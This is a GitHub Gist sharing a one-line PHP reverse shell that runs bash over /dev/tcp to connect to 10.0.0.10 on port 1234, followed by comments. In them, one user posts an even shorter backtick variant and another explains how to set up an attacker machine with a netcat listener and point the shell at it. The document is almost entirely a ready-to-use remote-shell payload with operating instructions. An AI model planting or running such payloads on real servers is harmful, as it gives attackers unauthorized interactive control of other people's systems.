Skip to content

Instantly share code, notes, and snippets.

@rshipp
Created July 17, 2014 15:06
Show Gist options
  • Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

Then this is the tiniest

<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>

@dbstreif
Copy link

dbstreif commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.

@85406043
Copy link

85406043 commented Jun 5, 2022

eu não sei qual ip usar, alguém me ajuda por gentileza !

@85406043
Copy link

85406043 commented Jun 5, 2022

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@SergioChicoITCL
Copy link

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@85406043

  1. You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
  2. You have to open a listening port in your attacking machine, (nc -nvlp 1234)
  3. You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)

And thats all.

@85406043
Copy link

85406043 commented Jun 6, 2022

@SergioChicoITCL muito obrigado campeão ! você é demais !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment